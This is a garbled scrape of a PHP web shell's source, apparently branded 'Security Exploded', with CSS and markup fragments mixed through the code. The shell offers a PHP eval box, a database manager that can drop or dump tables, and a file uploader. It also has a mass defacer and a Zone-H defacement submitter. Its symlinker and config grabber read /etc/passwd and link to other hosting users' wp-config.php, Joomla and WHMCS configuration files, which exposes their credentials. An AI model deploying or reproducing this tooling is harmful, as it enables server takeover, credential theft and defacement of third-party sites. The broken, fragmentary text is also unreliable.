; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .explore th{ padding:3px 8px; font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .explore tr:hover{ background:#111111; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .sembunyi{ display:none; padding:0;margin:0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .jaya{ margin:5px; text-align:right; =$color; ?>;} .footer{ background:#111111; width:99%; padding:5px; margin:10px auto 5px; text-align:center; font-size:13px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .footer a{ font-size:14px; } .footer span{ font-size:14px;} </style>
="Time On Server : ".date("d M Y H:i:s",time()).""; ?>
        Remove | Logout      
                          About
|
=$buff; ?> |
Jumper Multi Symlinker Config Grabber
Mass Directory Defacer Zone-H Submiter
if(isset($_GET['x']) && ($_GET['x'] == 'kill')) {
echo "
<tr>
<td valign=top bgcolor=#151515 class=style2 style=width: 139px>
<center><b><font size=5 style=italic color=#00ff00>Shell Killer</font></b></center></td></tr></table>
";
echo '
Do You Really Want To Delete This Shell ?
'; ?>
Shell Has Been Killed... Take Care And Stay Safe '); else echo 'Unlink Error !';
} ///////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'php')) { @ini_set('output_buffering',0); echo "
<tr>
<td valign=top bgcolor=#151515 class=style2 style=width: 139px>
<center><b><font size=5 style=italic color=#00ff00>Eval</font></b></center></td></tr></table>
"; ?>
<textarea class="output" name="cmd" id="cmd"> </textarea> |
".$sql_query_error."
";} if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;} if ((!$submit) or ($sql_x)) { echo ""; if ($tbl_struct) { echo "
"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ": <textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea> |
Fields: "; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name." ";} echo " |
"; if (count($sqlquicklaunch) > 0) { foreach($sqlquicklaunch as $item) { echo "[ ".$item[0]." ] "; } } } echo "
|
HOME
'; $result = mysql_list_dbs($sql_sock); if (!$result) { echo mysql_smarterror(); } else { echo ' '; $c = 0; $dbs = ""; while ($row = mysql_fetch_row($result)) { $dbs .= "\t\t\n"; $c++; } echo "\t\t Databases (".$c.")\n"; echo $dbs; } echo ' '; if (isset($sql_db)) { $result = mysql_list_tables($sql_db); if (!$result) { $result = mysql_list_dbs($sql_sock); $num = mysql_num_rows($result); for( $i = 0; $i < $num; $i++ ) { $dbname = mysql_dbname( $result, $i ); echo "
\n"; $c = 0; while ($row = mysql_fetch_array($result)) { $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "\t+ ".htmlspecialchars($row[0])." (".$count_row[0].")\n"; mysql_free_result($count); $c++; } if (!$c) { echo "No tables found in database"; } } } echo ' |
';
$diplay = TRUE;
if (@$sql_db) {
if (!is_numeric($c)) { $c = 0; }
if ($c == 0) { $c = "no"; }
echo "\tThere are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
if (count(@$dbquicklaunch) > 0) {
foreach($dbsqlquicklaunch as $item) {
echo "[ ".$item[0]." ] ";
}
}
echo "\n";
$xs = array("","dump");
if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
elseif ($sql_tbl_x == "insert") {
if ($sql_tbl_insert_radio == 1) {
$keys = "";
$akeys = array_keys($sql_tbl_insert);
foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
$values = "";
$i = 0;
foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
$sql_x = "query";
$sql_tbl_x = "browse";
}
elseif ($sql_tbl_insert_radio == 2) {
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
$result = mysql_query($sql_query) or print(mysql_smarterror());
$result = mysql_fetch_array($result, MYSQL_ASSOC);
$sql_x = "query";
$sql_tbl_x = "browse";
}
}
if ($sql_x == "query") {
echo " "; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";} if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;} if ((!$submit) or ($sql_x)) { echo "
"; } if ($sql_x == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! "; } else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\". Reason: ".mysql_smarterror(); } } elseif ($sql_x == "dump") { if (empty($submit)) { $diplay = FALSE; echo " SQL-Dump: "; echo "DB: "; $v = join (";",$dmptbls); echo "Only tables (explode \";\") : "; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "File: "; echo "Download: "; echo "Save to file: "; echo " "; echo ""; } else { $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} else { fwrite($fp,$ret); fclose($fp); echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; } } else {echo "Dump: nothing to do!";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; } if (empty($sql_tbl_page)) { $sql_tbl_page = 0; } if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; } if (empty($sql_tbl_le)) { $sql_tbl_le = 30; } $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) { $perpage = 10; } $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") { $asc_desc = "DESC"; } else { $asc_desc = "ASC"; } $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo "Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)"; echo " "; echo "[ Structure ] "; echo "[ Browse ] "; echo "[ Dump ] "; echo "[ Insert ] "; if ($sql_tbl_x == "structure") { echo "Under construction!"; } if ($sql_tbl_x == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { echo "Under construction!"; } else { echo " Inserting row into table: "; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock) or print(" ".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo " "; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo ""; $i++; } echo "
"; echo "Insert as new row"; if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} echo " "; } } if ($sql_tbl_x == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo " "; echo "Page: "; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} if (($i/30 == round($i/30)) and ($i > 0)) {echo " ";} else { echo " "; } } if ($i == 0) {echo "empty";} echo " From: To: "; echo " \n"; echo ""; echo ""; for ($i=0;$i"; if (empty($e[0])) {$e[0] = "a";} if (@$e[1] != $v) {echo "".$v."";} else {echo "".$v."";} echo ""; } echo ""; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) { $name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++; } if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); } echo ""; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") { $v = "NULL"; } echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo "
"; echo "With selected:"; echo "Delete"; echo " "; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) { echo mysql_smarterror(); } else { echo ' '; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo''; $i++; } echo "\t\t\n". "\t\t\n"; echo'
With selected:
Drop
Empty";
Dump";
Check table";
Optimize table";
Repair table";
Analyze table";
';
mysql_free_result($result);
}
}
}
}
}
else {
$xs = array("","newdb","serverstatus","servervars","processes","getfile");
if (in_array($sql_x,$xs)) {
echo '
"; if ($sql_x == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! ";} else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\". Reason: ".mysql_smarterror();} } if ($sql_x == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo " Server status variables: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo "
";} else {echo "File \"".$sql_getfile."\": ".nl2br(htmlspecialchars($f))." ";} mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); } } } } echo ' |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Affected rows: $affected |
---|
Filename | ".$file." |
Size | ".ukuran($file)." |
Permission | ".get_perms($file)." |
Owner | ".$owner." |
Create time | ".date("d-M-Y H:i",@filectime($file))." |
Last modified | ".date("d-M-Y H:i",@filemtime($file))." |
Last accessed | ".date("d-M-Y H:i",@fileatime($file))." |
Actions | Edit | Rename | Delete | Download (GZip) |
View | Text | Code | Image |
<textarea class="output" name="content"> =$content; ?> </textarea> | |
Save as =$msg; ?> |
Byee !!!!!!"; } ////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ @ini_set('output_buffering',0); echo "
Uploader |
Upload From Computer | |
---|---|
Upload From URL | ||||||||
---|---|---|---|---|---|---|---|---|
|
<tr>
<td valign=top bgcolor=#151515 class=style2 style=width: 139px>
<center><b><font size=5 style=italic color=#00ff00>Jumping</font></b></center></td></tr></table>
"; ?>
<?php echo "<table class="cmdbox"><td colspan="2">"; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die("[-] ERROR : Safe_mode = On ");set_time_limit(0); echo "<table class="cmdbox">
<td colspan="2">";@$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die ("[-] ERROR : I Can't Read [ /etc/passwd ]
<div class="info">
<div class="jaya"> © ".date('Y',time())." Security Exploded "); } $pub = array(); $users = array(); $conf = array(); $i = 0;
while(!feof($passwd)){ $str = fgets($passwd); if ($i > 100){ $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username); array_push($pub,$dirz); } } } $i++; } foreach ($users as $user){ echo '
'; } echo "[Found !] | /home/'.$user.'/public_html/ |
///////////////////////////////////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')) { @ini_set('output_buffering',0); echo "
<tr>
<td valign=top bgcolor=#151515 class=style2 style=width: 139px>
<center><b><font size=5 style=italic color=#00ff00>Multi Tool Symlink</font></b></center></td></tr></table>
"; ?>
Multi Tool Symlink | ||||
---|---|---|---|---|
Manual Symlink | Auto Symlink | Domain Viewer | ||
#==================[ Multi Tool Symlink ]==================#
if(isset($_POST['domain'])) { ?>
[ Domain Viewer by ]
Notes: If Blank(No Domain) That Mean Not Work Use Domain Viewer, You Can Use Auto Symlink Server
<?php function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = 'OFF'; } else { $openBaseDir = 'ON'; }
return $openBaseDir; }
echo '
';
$pg = basename(FILE);
$safe_mode = @ini_get('safe_mode');
$dir = @getcwd();
////////////////////////////////////////////////////
// LET'S PLAY ~
##.htaccess
@mkdir('explodedsym',0777);
@symlink("/","explodedsym/root");
$htaccss = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
file_put_contents("explodedsym/.htaccess",$htaccss); $etc = file_get_contents("/etc/passwd"); $etcz = explode("\n",$etc); ##Symlink to the ROOT :p foreach($etcz as $etz){ $etcc = explode(":",$etz); error_reporting(0); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"explodedsym/".$etcc[0].'-PhpBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"explodedsym/".$etcc[0].'-vBulletin.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"explodedsym/".$etcc[0].'-IPB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"explodedsym/".$etcc[0].'-MyBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"explodedsym/".$etcc[0].'-SMF.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"explodedsym/".$etcc[0].'-Drupal.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"explodedsym/".$etcc[0].'-e107.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"explodedsym/".$etcc[0].'-Seditio.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"explodedsym/".$etcc[0].'-osCommerce.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt'); } ############################# if(is_readable("/var/named")){ echo' '; echo''; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $i += 1; $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
break; ################################## error_reporting(0); $etc = file_get_contents("/etc/passwd"); $etcz = explode("\n",$etc); if(is_readable("/etc/passwd")){ echo'
$list = scandir("/var/named"); foreach($etcz as $etz){ $etcc = explode(":",$etz); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); if($owner['name'] == $etcc[0]) { $i += 1; echo " "; }}}} echo "Total Domains Found: ".$i."";} break; ############################### if(is_readable("/etc/named.conf")){ echo'
"; } else { echo " "; }break; ############################ if(is_readable("/etc/valiases")){ echo'
"; } else { echo ""; } break; } ################################## #==================[ Multi Tool Symlink ]==================# if(isset($_POST['symlinkr'])) { @set_time_limit(0); @mkdir('sym',0777); error_reporting(0); $htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $op =@fopen ('sym/.htaccess','w'); fwrite($op ,$htaccess); echo ' [ Manual Symlink ]
'.$symfile.'';}} #==================[ Multi Tool Symlink ]==================# if(isset($_POST['symlinks'])) { @set_time_limit(0); echo " [ Auto Symlink Server]";
$d0mains = @file("/etc/named.conf");
##httaces
if($d0mains){
@mkdir("explodedsyms",0777);
@chdir("explodedsyms");
@exe("ln -s / root");
$file3 = 'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo "
";
$dcount = 1;
";unlink("test.txt");
} else
echo "Cannot create Symlink";
}
}
}
}
/////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////
foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo " "; flush(); $dcount++;}}} echo "
Symlink Server !"; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;}fclose($file); echo "
';$temp = trim($temp);$file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){$s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;} fclose($file); echo "
elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')) { echo "
"; error_reporting(0);?>
|
Done
";}}} ///////////// /////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'zone')) { @ini_set('output_buffering',0); echo "
<tr>
<td valign=top bgcolor=#151515 class=style2 style=width: 139px>
<center><b><font size=5 style=italic color=#00ff00>Zone-H Submiter</font></b></center></td></tr></table>
"; ?>
Zone-H Defacer | |
---|---|
---------------------------Select One--------------------------- Known Vulnerability (i.e. Unpatched System) Undisclosed (new) Vulnerability Configuration / Admin Mistake Brute Force Attack Social Engineering Web Server Intrusion Web Server External Module Intrusion Mail Server Intrusion FTP Server Intrusion SSH Server Intrusion Telnet Server Intrusion RPC Server Intrusion Shares Misconfiguration Other Server Intrusion SQL Injection URL Poisoning File Inclusion Other Web Application Bug Remote Administrative Panel Access Bruteforcing Remote Administrative Panel Access Password Guessing Remote Administrative Panel Access Social Engineering Attack Against Administrator(Password StealingSniffing) Access Credentials Through Man In the Middle Attack Remote Service Password Guessing Remote Service Password Bruteforce Rerouting After Attacking The Firewall Rerouting After Attacking The Router DNS Attack Through Social Engineering DNS Attack Through Cache Poisoning Not available ---------------Select One----------------- Heh...Just For Fun! Revenge Against That Website Political Reasons As a Challenge I Just Want To Be The Best Defacer Patriotism Not Available | |
<textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains" placeholder="List Of Domains"></textarea>
|
[-] Curl Is Not Supported !![-]'); } $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)) { die (" "); } elseif($method == "--------SELECT--------") { die("[+] YOU MUST SELECT THE METHOD [+]"); } elseif($neden == "--------SELECT--------") { die("[+] YOU MUST SELECT THE REASON [+]"); } elseif(empty($site)) { die("[+] YOU MUST INTER THE SITES LIST [+]"); } $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://".$sites[$i]; } ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]); echo "$sites[$i]"; ++$i; } } } ///////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0); echo "
Config Grabber |
<form action="?y=<?=$pwd; ?>&x=grabc" method="post">
Config Grabber | ||||
---|---|---|---|---|
<textarea name="passwd" class='area' rows='15' cols='60'>=file_get_contents('/etc/passwd'); ?></textarea> |
wait ...
"; foreach($passwd as $pwd){ $pawd=explode(":",$pwd);$user =$pawd[0]; @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt'); @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt'); @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt'); @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt'); @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt'); @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt'); @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt'); @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt'); @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt'); @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt'); @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt'); @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt'); @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt'); @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt'); @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt'); @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt'); @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt'); @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt'); @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt'); @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt'); @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt'); 